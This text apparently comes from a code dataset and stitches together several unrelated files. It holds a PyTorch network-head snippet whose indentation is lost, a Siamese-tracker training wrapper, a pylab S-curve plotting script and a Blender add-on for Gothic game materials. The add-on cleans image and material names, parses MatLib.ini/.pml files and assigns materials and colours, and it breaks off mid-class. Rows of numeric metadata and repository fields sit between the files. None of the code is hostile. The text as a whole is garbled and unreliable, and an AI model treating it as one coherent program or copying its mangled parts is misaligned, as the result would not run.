class BasicHead(nn.Sequential):
def __init__(self, in_channels, out_channels, **kwargs):
super().__init__()
class PreActHead(nn.Sequential):
def __init__(self, in_channels, out_channels, normalization, activation, **kwargs):
super().__init__(collections.OrderedDict(m for m in [
('norm', normalization(in_channels)),
('act', activation(inplace=True)),
] if m[1] is not None))
class MobileNetV2Head(nn.Sequential):
def __init__(self, in_channels, out_channels, normalization, activation, **kwargs):
super().__init__(collections.OrderedDict(m for m in [
('conv', nn.Conv2d(
in_channels, out_channels, kernel_size=1, padding=0, stride=1, bias=False)),
('norm', normalization(out_channels)),
('act', activation(inplace=True)),
] if m[1] is not None))
class MobileNetV3Head(nn.Sequential):
def __init__(self, in_channels, out_channels, normalization, activation, **kwargs):
channels = round(out_channels * 0.75)
super().__init__(collections.OrderedDict(m for m in [
('conv1', nn.Conv2d(
in_channels, channels, kernel_size=1, padding=0, stride=1, bias=False)),
('norm1', normalization(channels)),
('act1', activation(inplace=True)),
('pool', nn.AdaptiveAvgPool2d(1)),
('conv2', nn.Conv2d(
channels, out_channels, kernel_size=1, padding=0, stride=1, bias=True)),
('act2', activation(inplace=True)),
] if m[1] is not None))
| 36.413043
| 93
| 0.605373
| 188
| 1,675
| 5.12766
| 0.271277
| 0.091286
| 0.118257
| 0.108921
| 0.681535
| 0.681535
| 0.681535
| 0.681535
| 0.642116
| 0.561203
| 0
| 0.021809
| 0.260896
| 1,675
| 45
| 94
| 37.222222
| 0.756866
| 0
| 0
| 0.34375
| 0
| 0
| 0.027607
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.0625
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e473c9d126543858d93cd7cc38a1863415d85a8
| 3,419
|
py
|
Python
|
siam_tracker/models/train_wrappers/pairwise_wrapper.py
|
microsoft/PySiamTracking
|
a82dabeaa42a7816dbd8e823da7b7e92ebb622ce
|
[
"MIT"
] | 28
|
2020-03-18T04:41:21.000Z
|
2022-02-24T16:44:01.000Z
|
siam_tracker/models/train_wrappers/pairwise_wrapper.py
|
HengFan2010/PySiamTracking
|
a82dabeaa42a7816dbd8e823da7b7e92ebb622ce
|
[
"MIT"
] | 1
|
2020-04-05T15:23:22.000Z
|
2020-04-07T16:23:12.000Z
|
siam_tracker/models/train_wrappers/pairwise_wrapper.py
|
HengFan2010/PySiamTracking
|
a82dabeaa42a7816dbd8e823da7b7e92ebb622ce
|
[
"MIT"
] | 11
|
2020-03-19T00:30:06.000Z
|
2021-11-10T08:22:35.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import torch
from collections import OrderedDict
from ..builder import build_tracker, TRAIN_WRAPPERS
from ...datasets import TrainPairDataset, build_dataloader
from ...runner import Runner
from ...utils.parallel import MMDataParallel
from ...utils import load_checkpoint
@TRAIN_WRAPPERS.register_module
class PairwiseWrapper(object):
def __init__(self,
train_cfg,
model_cfg,
work_dir,
log_level,
resume_from=None,
gpus=1):
""" Training a tracker by image pairs. This is the most common strategy to train a
siamese-network-based tracker. Generally, two images are randomly sampled from the
dataset, one for template image (z_img) and another for search region (x_img). The
tracker model needs to locate the target object in search region.
"""
self.model_cfg = model_cfg
self.train_cfg = train_cfg
# Step 1, build the tracker model.
model = build_tracker(model_cfg, is_training=True, train_cfg=train_cfg, test_cfg=None)
if resume_from is not None:
load_checkpoint(model, resume_from)
model = MMDataParallel(model, device_ids=list(range(gpus))).cuda()
# Step 2, build image-pair datasets
train_dataset = TrainPairDataset(train_cfg.train_data)
self.data_loaders = build_dataloader(train_dataset,
train_cfg.samples_per_gpu,
train_cfg.workers_per_gpu,
num_gpus=gpus)
# Step 3, build a training runner
# build runner
self.runner = Runner(model, self.batch_processor, train_cfg.optimizer, work_dir, log_level)
self.runner.register_training_hooks(train_cfg.lr_config, train_cfg.optimizer_config,
train_cfg.checkpoint_config, train_cfg.log_config)
if 'status_config' in train_cfg and train_cfg['status_config'] is not None:
self.runner.register_status_hook(train_cfg['status_config'])
def run(self):
self.runner.run(self.data_loaders,
self.train_cfg.workflow,
self.train_cfg.total_epochs)
@staticmethod
def batch_processor(model, data, train_mode):
losses = model(**data)
loss, log_vars = PairwiseWrapper.parse_losses(losses)
outputs = dict(
loss=loss, log_vars=log_vars, num_samples=len(data['z_imgs'].data))
return outputs
@staticmethod
def parse_losses(losses):
log_vars = OrderedDict()
for loss_name, loss_value in losses.items():
if isinstance(loss_value, torch.Tensor):
log_vars[loss_name] = loss_value.mean()
elif isinstance(loss_value, list):
log_vars[loss_name] = sum(_loss.mean() for _loss in loss_value)
else:
raise TypeError(
'{} is not a tensor or list of tensors'.format(loss_name))
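        # the optimized loss sums every logged entry whose key contains 'loss';
        # the remaining entries are kept for logging only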
loss = sum(_value for _key, _value in log_vars.items() if 'loss' in _key)
log_vars['loss'] = loss
for name in log_vars:
log_vars[name] = log_vars[name].item()
return loss, log_vars
| 38.852273
| 99
| 0.623867
| 418
| 3,419
| 4.856459
| 0.344498
| 0.070936
| 0.023645
| 0.014778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001672
| 0.300088
| 3,419
| 87
| 100
| 39.298851
| 0.846636
| 0.150044
| 0
| 0.033898
| 0
| 0
| 0.031458
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067797
| false
| 0
| 0.118644
| 0
| 0.237288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e4d5fb0fa81e143693d4b850e79279a83dcb058
| 622
|
py
|
Python
|
preprocessed_data/RGHS/Code/S_model.py
|
SaiKrishna1207/Underwater-Image-Segmentation
|
78def27e577b10e6722c02807bdcfeb7ba53d760
|
[
"MIT"
] | null | null | null |
preprocessed_data/RGHS/Code/S_model.py
|
SaiKrishna1207/Underwater-Image-Segmentation
|
78def27e577b10e6722c02807bdcfeb7ba53d760
|
[
"MIT"
] | null | null | null |
preprocessed_data/RGHS/Code/S_model.py
|
SaiKrishna1207/Underwater-Image-Segmentation
|
78def27e577b10e6722c02807bdcfeb7ba53d760
|
[
"MIT"
] | null | null | null |
import numpy as np
import pylab as pl
x = [] # Make an array of x values
y = [] # Make an array of y values for each x value
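# S-model curve (our reading of the formula below): y = x * 2^(1 - |x|/128),
# which leaves the endpoints near +/-128 almost unchanged while amplifying
# mid-range values, giving the S-shaped contrast stretch plotted here.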
for i in range(-128,127):
x.append(i)
for j in range(-128,127):
temp = j *(2**(1 - abs((j/128))))
y.append(temp)
pl.axis([-128, 127,-128, 127])
pl.title('S-model Curve Function ',fontsize=20)# give plot a title
pl.xlabel('Input Value',fontsize=20)# make axis labels
pl.ylabel('Output Value',fontsize=20)
pl.plot(x, y,color='red') # use pylab to plot x and y
pl.show() # show the plot on the screen
| 23.037037
| 66
| 0.639871
| 119
| 622
| 3.344538
| 0.478992
| 0.090452
| 0.055276
| 0.065327
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093626
| 0.192926
| 622
| 27
| 67
| 23.037037
| 0.699203
| 0.360129
| 0
| 0
| 0
| 0
| 0.126289
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e4db1ef4c553d26b23cdf167ecc2ec7e965d780
| 36,578
|
py
|
Python
|
tools/Blender Stuff/Plugins/Gothic_MaT_Blender/1.3/Gothic_MaT_Blender_1_3.py
|
PhoenixTales/gothic-devk
|
48193bef8fd37626f8909853bfc5ad4b7126f176
|
[
"FSFAP"
] | 3
|
2021-04-13T07:12:30.000Z
|
2021-06-18T17:26:10.000Z
|
tools/Blender Stuff/Plugins/Gothic_MaT_Blender/1.3/Gothic_MaT_Blender_1_3.py
|
PhoenixTales/gothic-devk
|
48193bef8fd37626f8909853bfc5ad4b7126f176
|
[
"FSFAP"
] | null | null | null |
tools/Blender Stuff/Plugins/Gothic_MaT_Blender/1.3/Gothic_MaT_Blender_1_3.py
|
PhoenixTales/gothic-devk
|
48193bef8fd37626f8909853bfc5ad4b7126f176
|
[
"FSFAP"
] | 2
|
2021-03-23T19:45:39.000Z
|
2021-04-17T17:21:48.000Z
|
bl_info = {
"name": "Gothic Materials and Textures Blender",
"description": "Makes life easier for Gothic material export",
"author": "Diego",
"version": (1, 3, 0),
"blender": (2, 78, 0),
"location": "3D View > Tools",
"warning": "", # used for warning icon and text in addons panel
"wiki_url": "",
"tracker_url": "",
"category": "Development"
}
import bpy
# if Blender's bundled Python is not used, these packages might not be installed
try:
from mathutils import Color
except ImportError:
raise ImportError('Package mathutils needed, but not installed')
try:
import numpy
except ImportError:
raise ImportError('Package numpy needed, but not installed')
try:
import os.path
except ImportError:
raise ImportError('Package os needed, but not installed')
try:
import colorsys
except ImportError:
raise ImportError('Package colorsys needed, but not installed')
from bpy.props import (StringProperty,
BoolProperty,
IntProperty,
FloatProperty,
EnumProperty,
PointerProperty,
)
from bpy.types import (Panel,
Operator,
PropertyGroup,
)
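# Note: the assignment-style bpy.props definitions below target Blender 2.7x
# (see bl_info); Blender 2.80+ expects annotation syntax (name: StringProperty(...)).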
# ------------------------------------------------------------------------
# store properties in the active scene
# ------------------------------------------------------------------------
class GothicMaterialSettings(PropertyGroup):
apply_to_selected_only = BoolProperty(
name="Only Selected Objects",
description="Affect only selected objects rather than all (unhidden) objects in the scene",
default = True
)
keep_existing_materials = BoolProperty(
name="Keep Existing Slots",
description="Keep existing material slots if their texture does not occur and only add new on top",
default = True
)
set_transparency = BoolProperty(
name="Transparency",
description="Alpha channel will affect transparency in textured view",
default = True
)
keep_portals = BoolProperty(
name="Keep Portals",
description="Do not overwrite Portal or Ghostoccluder materials",
default = True
)
matching_name = BoolProperty(
name="Use Matching Names",
description="If exists, use Gothic material with same name as UV-image, even if multiple Gothic materials use this image",
default = True
)
isolate_all_layers = BoolProperty(
name="Isolate in all Layers",
description="Isolate objects in all layers",
default = True
)
pixel_samples = IntProperty(
name = "Pixels",
description="Number of pixels taken for material color, becomes very slow for high numbers",
default = 50,
min = 1,
max = 1000
)
saturation = FloatProperty(
name = "Saturation",
description="Makes material colors more or less saturated, 0.5 for unchanged",
default = 1.,
min = 0.,
max = 2.
)
value = FloatProperty(
name = "Brigthness",
description="Changes material color brigthness",
default = 1.,
min = 0.,
max = 2.
)
searched_material = StringProperty(
name="Material to Search",
description="",
default="unknown",
maxlen=1024,
)
ambiguous_materials = EnumProperty(
name="What Material Name for ambiguous Textures?",
description="What material name for ambiguous textures?",
items=[ ('first', "First Appearance", ""),
('last', "Last Appearance", ""),
('generic', "Generic: ambiguous1, ...", ""),
]
)
case = EnumProperty(
name="Case for Images and Textures",
description="Case-sensitivity for images and textures",
items=[ ('keep', "Keep File Case", ""),
('upper', "UPPER", ""),
('lower', "lower", ""),
]
)
matlib_filepath = StringProperty(
name="",
description="Filepath to MatLib.ini",
default="Filepath to MatLib.ini",
maxlen=1024,
subtype='FILE_PATH')
# ------------------------------------------------------------------------
# operators
# ------------------------------------------------------------------------
# hides all objects that do not have the material specified in the "searched_material" property
# optional: isolate in all layers
class GothicIsolateObjetcs(bpy.types.Operator):
"""Isolate all objects that use this material. Alt+H to reveal""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "object.gothic_isolate_objects" # unique identifier for buttons and menu items to reference.
bl_label = "Gothic: Isolate Objects" # display name in the interface.
bl_options = {'REGISTER'} # enable undo for the operator.
def execute(self, context): # execute() is called by blender when running the operator.
scene = context.scene
searchfor = scene.gothic_tools.searched_material
isolate_all_layers = scene.gothic_tools.isolate_all_layers
if searchfor == '':
self.report({'WARNING'}, 'No Material Specified')
return {'CANCELLED'}
matindex = bpy.data.materials.find(searchfor)
if matindex == -1:
self.report({'WARNING'}, 'Material not found')
return {'CANCELLED'}
else:
mat = bpy.data.materials[matindex]
objects_found = []
# two steps
# first: check if any objects are found
for object in bpy.data.objects:
# if this layer is not supposed to be affected skip
if not isolate_all_layers:
if not object.layers[scene.active_layer]:
continue
# if found, add to the list of found objects
for slot in object.material_slots:
try:
if slot.material == mat:
objects_found.append(object)
break
except AttributeError:
pass
# second: if so, hide + deselect all others and reveal + select themselves (in case they were hidden before)
if objects_found:
for object in bpy.data.objects:
if object in objects_found:
object.hide = False
object.select = True
else:
object.hide = True
object.select = False
self.report({'INFO'}, str(len(objects_found)) + ' objects found')
else:
self.report({'INFO'}, 'No objects found')
return {'FINISHED'} # this lets blender know the operator finished successfully.
# changes the names of all used images to their filename
# if multiple images use the same file, only one is kept
# the others will be replaced by this one
class GothicCleanImages(bpy.types.Operator):
"""Rename and replace images not named as their filename""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "context.gothic_clean_images" # unique identifier for buttons and menu items to reference.
bl_label = "Gothic: Clean Images and Textures" # display name in the interface.
bl_options = {'REGISTER'} # enable undo for the operator.
def execute(self, context): # execute() is called by blender when running the operator.
scene = context.scene
case = scene.gothic_tools.case
replaced_counter = 0
renamed_counter = 0
#rename all images to their filename
for image in bpy.data.images:
if image.users:
filename = os.path.basename(image.filepath)
correct_index = bpy.data.images.find(filename)
if correct_index == -1:
image.name = filename
renamed_counter += 1
else:
correct_image = bpy.data.images[correct_index]
if image != correct_image:
print(image.name + ' remapped to ' + correct_image.name)
image.user_remap(correct_image)
replaced_counter +=1
# optional change to lower or upper case
for image in bpy.data.images:
if image.users:
if case.lower() == 'upper':
image.name = image.name.upper()
elif case.lower() == 'lower':
image.name = image.name.lower()
self.report({'INFO'}, str(replaced_counter) + ' unlinked, ' + str(renamed_counter) + ' renamed (except for case)')
return {'FINISHED'} # this lets blender know the operator finished successfully.
# Removes suffixes like ".001" and renames textures to image filename
# replaces materials with same name except suffixes
# keeps only one texture per image file, replaces others by this one
class GothicCleanMaterials(bpy.types.Operator):
"""Remove suffixes as .001 from materials. Note: If object has \"mat\" and \"mat.001\", the slots Will not be merged""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "context.gothic_clean_materials" # unique identifier for buttons and menu items to reference.
bl_label = "Gothic: Clean Materials" # display name in the interface.
bl_options = {'REGISTER'} # enable undo for the operator.
def execute(self, context): # execute() is called by blender when running the operator.
replaced_counter = 0
renamed_counter = 0
# remove suffixes and replace materials that would be named the same
for mat in bpy.data.materials:
if mat.users and len(mat.name)>4:
if mat.name[-4]=='.':
try:
int(mat.name[-3:])
targetname = mat.name[0:-4]
index_of_existing = bpy.data.materials.find(targetname)
if index_of_existing == -1:
mat.name = targetname
renamed_counter +=1
else:
mat.user_remap(bpy.data.materials[index_of_existing])
replaced_counter += 1
except ValueError:
continue
# change texture name to image file name
for tex in bpy.data.textures:
if tex.users:
try:
# may exist already, don't overwrite name yet
texname = os.path.basename(tex.image.filepath)
except AttributeError:
print(tex.name + ' has no image')
continue
found_tex_index = bpy.data.textures.find(texname)
if found_tex_index == -1:
tex.name = texname
else:
tex.user_remap(bpy.data.textures[found_tex_index])
self.report({'INFO'}, str(replaced_counter) + ' unlinked, ' + str(renamed_counter) + ' renamed')
return {'FINISHED'}
# takes a sample of pixels and calculates average color for every material with image
class GothicCalcColors(bpy.types.Operator):
"""Calculate all material colors by texture""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "context.gothic_calc_colors" # unique identifier for buttons and menu items to reference.
bl_label = "Gothic: Calculate Material Colors" # display name in the interface.
bl_options = {'REGISTER'} # enable undo for the operator.
def execute(self, context):
scene = context.scene
set_transparency = scene.gothic_tools.set_transparency
pixel_samples = scene.gothic_tools.pixel_samples
value = context.scene.gothic_tools.value
saturation = context.scene.gothic_tools.saturation
colors_calculated = 0
too_bright = False
for material in bpy.data.materials:
print('Calc color for ' + material.name)
try:
if len(material.texture_slots[0].texture.image.pixels):
image = material.texture_slots[0].texture.image
else:
continue
except AttributeError:
continue
averagecolor = numpy.array([0.,0.,0.])
# "pixels" has the structure [pixel1_red, pixel1_green, pixel1_blue, pixel1_alpha, pixel2_red, ...]
samples = pixel_samples
n = int(len(image.pixels)/4)
# take no more samples than pixels exist
if samples > n:
samples = n
pixels = image.pixels
for i in range(samples):
pos = int(i/samples*n)*4
averagecolor += image.pixels[pos:pos+3]
averagecolor = averagecolor / samples
if True in numpy.isnan(averagecolor):
averagecolor[:] = [0,0,0]
# adjust saturation and brightness (value)
adjustedcolor = Color(averagecolor)
hsv = list(colorsys.rgb_to_hsv(*adjustedcolor))
hsv[1] += saturation - 1
hsv[2] += value - 1
new_rgb = colorsys.hsv_to_rgb(*hsv)
# Colors may be out of range in some cases, norm to [0,1]
if any(c>1 for c in new_rgb):
                max_rgb = max(new_rgb)
                new_rgb = (new_rgb[0] / max_rgb,
                           new_rgb[1] / max_rgb,
                           new_rgb[2] / max_rgb)
too_bright = True
material.diffuse_color = Color(new_rgb)
material.diffuse_intensity = 1.0
colors_calculated += 1
if set_transparency:
material.use_transparency = True
self.report({'INFO'}, str(colors_calculated) + ' colors updated')
if too_bright:
self.report({'INFO'}, str(colors_calculated) + ' colors updated (clamped)')
return {'FINISHED'}
# replaces all UV textures by the image that the material of this face has
class GothicAssignImages(bpy.types.Operator):
"""Apply UV-Images that correspond to the assigned materials""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "context.gothic_assign_images" # unique identifier for buttons and menu items to reference.
bl_label = "Gothic: Assign Images by Materials" # display name in the interface.
bl_options = {'REGISTER'} # enable undo for the operator.
def execute(self, context): # execute() is called by blender when running the operator.
scene = context.scene
apply_to_selected_only = scene.gothic_tools.apply_to_selected_only
if apply_to_selected_only:
objects_tobechanged = context.selected_objects
if not objects_tobechanged:
self.report({'WARNING'}, 'No objects selected')
else:
objects_tobechanged = bpy.data.objects
for object in objects_tobechanged:
if not object.type == 'MESH':
continue
bpy.context.scene.objects.active = object
bpy.ops.object.mode_set(mode = 'OBJECT')
mesh = object.data
if not mesh.uv_textures:
uv = mesh.uv_textures.new('UvMap')
            # collect all materials and their image
            # map material index to image beforehand into dict: image_by_material_index
image_by_material_index = [None]*len(object.material_slots)
for matindex,matslot in enumerate(object.material_slots):
# if texture or texture image doesn't exist, return None
try:
image_by_material_index[matindex] = matslot.material.texture_slots[0].texture.image
except AttributeError:
pass
# assign image to face
uv = object.data.uv_textures[0]
for index,face in enumerate(mesh.polygons):
uv.data[index].image = image_by_material_index[face.material_index]
self.report({'INFO'}, 'UV-Images assigned to ' +str(len(objects_tobechanged)) + ' objects')
return {'FINISHED'}
# replaces materials by those that belong to the assigned UV textures
# at every call matlib.ini is parsed and a matching material is searched for every image
# depending on how often this texture is used by a material, the used material name is
# never: texture name without file extension
# once: take name from materialfilter
# more: ambiguous, depending on settings
# optionally faces with portal materials are not overwritten
# note that this will create a material for every used image in the file if it doesn't exist yet; this is done
# because it would be more troublesome to first filter out the materials that are actually needed
class GothicAssignMaterials(bpy.types.Operator):
"""Apply Materials that Correspond to the Unwrapped UV-Images""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "context.gothic_assign_materials" # unique identifier for buttons and menu items to reference.
bl_label = "Gothic: Assign Materials by UV-Images" # display name in the interface.
bl_options = {'REGISTER'} # enable undo for the operator.
def execute(self, context): # execute() is called by blender when running the operator.
scene = context.scene
apply_to_selected_only = scene.gothic_tools.apply_to_selected_only
matlib_filepath = scene.gothic_tools.matlib_filepath
ambiguous_materials = scene.gothic_tools.ambiguous_materials
matching_name = scene.gothic_tools.matching_name
apply_to_selected_only = scene.gothic_tools.apply_to_selected_only
keep_portals = scene.gothic_tools.keep_portals
# if no objects are selected and "only selected objects", cancel
if apply_to_selected_only:
objects_tobechanged = context.selected_objects
if not objects_tobechanged:
self.report({'WARNING'}, 'No objects selected')
return {'FINISHED'}
# if no valid matlib.ini specified, cancel
matlib_dirpath = os.path.dirname(matlib_filepath)
if not os.path.isfile(matlib_filepath):
self.report({'ERROR'}, 'Invalid MatLib.ini filepath')
return {'CANCELLED'}
# for every used image create or find a matching texture
# use existing textures with correct name if available
# map image to texture into dict "texture_by_image"
used_images = []
texture_by_image = {}
for image in bpy.data.images:
if image.users:
used_images.append(image)
found_matching_texindex = bpy.data.textures.find(image.name)
if found_matching_texindex == -1:
newtex = bpy.data.textures.new(image.name,'IMAGE')
newtex.image = image
texture_by_image[image] = newtex
else:
texture_by_image[image] = bpy.data.textures[found_matching_texindex]
""" gothic materials """
# parse matlib
# create one list of materials, one of corresponing textures and one for colors
# same index for matching material/texture/color
gmaterial_names = []
gtexture_names = []
gmaterial_colors = []
# append found items to given input variables
def add_materials_from_pml(file, materials, textures, colors):
if not os.path.isfile(file):
self.report({'WARNING'}, 'PML not found: ' + file)
return
            with open(file, 'r') as pml:
                for line in pml:
                    if not line.find('% zCMaterial') == -1:
                        materials.append("")
                        textures.append("")
                        colors.append("")
                    elif not line.find('name=string:') == -1:
                        materials[-1] = line[line.find('name=string:')+12:-1].upper()
                    elif not line.find('texture=string:') == -1:
                        textures[-1] = line[line.find('texture=string:')+15:-1].upper()
                    elif not line.find('color=color:') == -1:
                        colors[-1] = line[line.find('color=color:')+12:-1].split(' ')[:-1]
        with open(matlib_filepath, 'r') as matlib:
            for line in matlib:
                if '=#' in line:
                    add_materials_from_pml(os.path.join(matlib_dirpath, line[0:line.find('=#')]+'.pml'), gmaterial_names, gtexture_names, gmaterial_colors)
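        # For reference, a minimal sketch of the inputs this parser assumes (hypothetical
        # entries, not taken from any real MatLib.ini / .pml):
        #   MatLib.ini line:  STONE=#          -> STONE.pml is loaded from the same directory
        #   STONE.pml block:  % zCMaterial
        #                     name=string:STONEWALL
        #                     texture=string:NW_STONEWALL_01.TGA
        #                     color=color:128 128 128 255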
# find materials that appear more than once
# start from the end so that with duplicate materials
# the lower index entry will be removed
        seenmaterials = set()
        duplicates = []
        for offset, name in enumerate(reversed(gmaterial_names)):
            if name in seenmaterials:
                duplicates.append(len(gmaterial_names) - 1 - offset)
            else:
                seenmaterials.add(name)
# remove duplicate gothic materials from both lists
for duplicate in duplicates:
gmaterial_names.pop(duplicate)
gtexture_names.pop(duplicate)
# find gothic textures that are used by more than one material
ambiguoustex_names = list(set([texname for texname in gtexture_names if gtexture_names.count(texname)>1]))
ambiguoustex_defaultmat = {}
        for ambigtexname in ambiguoustex_names:
            # take first or last entry
            for index in range(len(gmaterial_names)):
                if gtexture_names[index] == ambigtexname:
                    ambiguoustex_defaultmat[ambigtexname.lower()] = gmaterial_names[index]
                    # if the first entry is taken: skip the remaining ones
                    # else defaultmat is overwritten on every further match
                    if ambiguous_materials == 'first':
                        break
# if a material with same name exists and option checked, overwrite
if matching_name:
if ambigtexname in gmaterial_names:
ambiguoustex_defaultmat[ambigtexname.lower()] = ambigtexname
# else if a material with same name except extension exists, take it as default
elif ambigtexname[0:-4] in gmaterial_names:
ambiguoustex_defaultmat[ambigtexname.lower()] = ambigtexname[0:-4]
""" blender materials """
# for every blender texture: what should be the material name
# if no corresponding gtex: same name as in gothic
        # if one corresponding gtex: use the existing material name
# if ambiguous: first, last or generic ('ambiguous1'...), additionally matching name if available
# save the determined material name in var "bmat_name_by_image" mapped by image
bmat_name_by_image = {}
bmat_color_by_image = {}
index_of_ambiguous = 1
for image in used_images:
gmat_exists = False
# gtex_index is used to find the gmat, because they have same indices
for gtex_index, gtex_name in enumerate(gtexture_names):
if gtex_name.lower() == image.name.lower():
bmat_color_by_image[image] = Color([int(x)/255 for x in gmaterial_colors[gtex_index]])
if not gtex_name in ambiguoustex_names:
bmat_name_by_image[image] = gmaterial_names[gtex_index]
else:
if ambiguous_materials=='generic':
bmat_name_by_image[image] = 'ambiguous'+str(index_of_ambiguous)
index_of_ambiguous += 1
else:
bmat_name_by_image[image] = ambiguoustex_defaultmat[image.name.lower()]
gmat_exists = True
break;
if not gmat_exists:
# take filename without extension and default color
bmat_name_by_image[image] = os.path.basename(image.name).upper()[0:-4]
bmat_color_by_image[image] = Color([0.8, 0.8, 0.8])
        # collect the materials that belong to any existing used image
        # (not only those images that appear in the selected objects, because it's simpler this way)
# use existing materials with correct name if available
# first create global 'unknown' material for faces without image
        # even if no face uses 'unknown', its zero user count will still be a useful indicator
if bpy.data.materials.find('unknown')==-1:
matunknown = bpy.data.materials.new('unknown')
matunknown.diffuse_color = Color([1,0,1]) # pink
else:
matunknown = bpy.data.materials[bpy.data.materials.find('unknown')]
material_by_image = {}
material_by_image[None] = matunknown
for image,bmat_name in bmat_name_by_image.items():
found_existing_bmat = False
for scannedmaterial in bpy.data.materials:
if scannedmaterial.name == bmat_name:
targetmat = scannedmaterial
found_existing_bmat = True
break;
if not found_existing_bmat:
targetmat = bpy.data.materials.new(bmat_name)
targetmat.diffuse_color = bmat_color_by_image[image]
material_by_image[image] = targetmat
# determine texture for this material
corresponding_texture = texture_by_image[image]
for slot in targetmat.texture_slots:
if slot:
break
else:
targetmat.texture_slots.add()
targetmat.texture_slots[0].texture = corresponding_texture
# iterate over all polygons and look up the matching material
# for every used image in the file the matching material is mapped inside var "material_by_image"
if apply_to_selected_only:
objects_tobechanged = context.selected_objects
else:
objects_tobechanged = bpy.data.objects
for object in objects_tobechanged:
if not object.type == 'MESH':
continue
if object.hide:
continue
bpy.context.scene.objects.active = object
bpy.ops.object.mode_set(mode = 'OBJECT')
mesh = object.data
# keep_mat_with_index stores material slot numbers which will not be overwritten by UV (portals)
keep_mat_with_index = []
# slot_is_used contains any material index that will not be deleted after reassigning the slots
slot_is_used = [False]*len(object.material_slots)
try:
if keep_portals:
for matindex, matslot in enumerate(object.material_slots):
n = matslot.material.name.lower()
if n == 'ghostoccluder' or \
n[0:2] == 'p:' or \
n[0:3] == 'pi:' or \
n[0:3] == 'pn:':
keep_mat_with_index.append(matindex)
slot_is_used[matindex] = True
except AttributeError:
pass
if not mesh.uv_textures:
                # in this case only the 'unknown' material (plus any kept portal materials) will be assigned
uv = mesh.uv_textures.new('UVMap')
else:
uv = mesh.uv_textures[0]
# for every polygon look up which material matches its UV image
for index,face in enumerate(mesh.polygons):
image = mesh.uv_textures[0].data[index].image
# dont assign anything if not supposed to because its a portal
if face.material_index in keep_mat_with_index:
continue;
# if no image, take 'unknown' mat
if not image:
mat = matunknown
else:
# for every image a material should be mapped in material_by_image
if image in material_by_image:
mat = material_by_image[image]
else:
                        # something went wrong, most likely image users were not updated correctly
                        raise ValueError('No mapped material found for ' + image.name + '. Most likely the images are not updated internally. Try restarting Blender')
# check if object has this material already
for slotindex,slot in enumerate(object.material_slots):
if slot.material == mat:
face.material_index = slotindex
slot_is_used[slotindex] = True
break;
# if not, add a slot at bottom (new slot will be last)
else:
bpy.ops.object.material_slot_add()
object.active_material = mat
object.material_slots[object.active_material_index].link = 'DATA'
face.material_index = object.active_material_index
slot_is_used.append(True)
# delete unused slots from bottom to top
for slot_reversed, used in enumerate(reversed(slot_is_used)):
if not used:
slot = len(slot_is_used) - slot_reversed - 1
object.active_material_index = slot
bpy.ops.object.material_slot_remove()
self.report({'INFO'}, 'Materials assigned to ' +str(len(objects_tobechanged)) + ' objects')
return {'FINISHED'} # this lets blender know the operator finished successfully.
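# Usage sketch (assumes the add-on is registered in a Blender 2.7x session; the path is hypothetical):
#   bpy.context.scene.gothic_tools.matlib_filepath = 'C:/Gothic/_work/Data/Meshes/MatLib.ini'
#   bpy.ops.context.gothic_assign_materials()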
# ------------------------------------------------------------------------
# gothic tools in objectmode
# ------------------------------------------------------------------------
class VIEW3D_PT_gothic_clean_duplicates_panel(Panel):
bl_idname = "OBJECT_PT_gothic_clean_duplicates_panel"
bl_label = "Clean Duplicates"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "Gothic Materials"
bl_context = "objectmode"
def draw(self, context):
layout = self.layout
scene = context.scene
gothic_tools = scene.gothic_tools
layout.operator('context.gothic_clean_images', text = 'Clean Images', icon = 'IMAGE_DATA')
layout.operator('context.gothic_clean_materials', text = 'Clean Materials', icon = 'MATERIAL')
layout.label(text="Case:")
layout.prop(gothic_tools, "case", text="")
layout.separator()
layout.separator()
class VIEW3D_PT_gothic_assign_materials_panel(Panel):
bl_idname = "VIEW3D_PT_gothic_assign_materials_panel"
bl_label = "UVs to Materials"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "Gothic Materials"
bl_context = "objectmode"
def draw(self, context):
layout = self.layout
scene = context.scene
gothic_tools = scene.gothic_tools
layout.operator('context.gothic_assign_materials', text = 'Assign Materials', icon = 'FACESEL')
layout.separator()
layout.prop(gothic_tools, "matlib_filepath", text="")
layout.prop(gothic_tools, "apply_to_selected_only")
layout.prop(gothic_tools, "keep_portals")
layout.separator()
layout.label(text="Ambiguous Textures:")
layout.prop(gothic_tools, "matching_name")
layout.label(text="or else")
layout.prop(gothic_tools, "ambiguous_materials", text="")
layout.separator()
layout.separator()
class VIEW3D_PT_gothic_assign_images_panel(Panel):
bl_idname = "VIEW3D_PT_gothic_assign_images_panel"
bl_label = "Materials to UVs"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
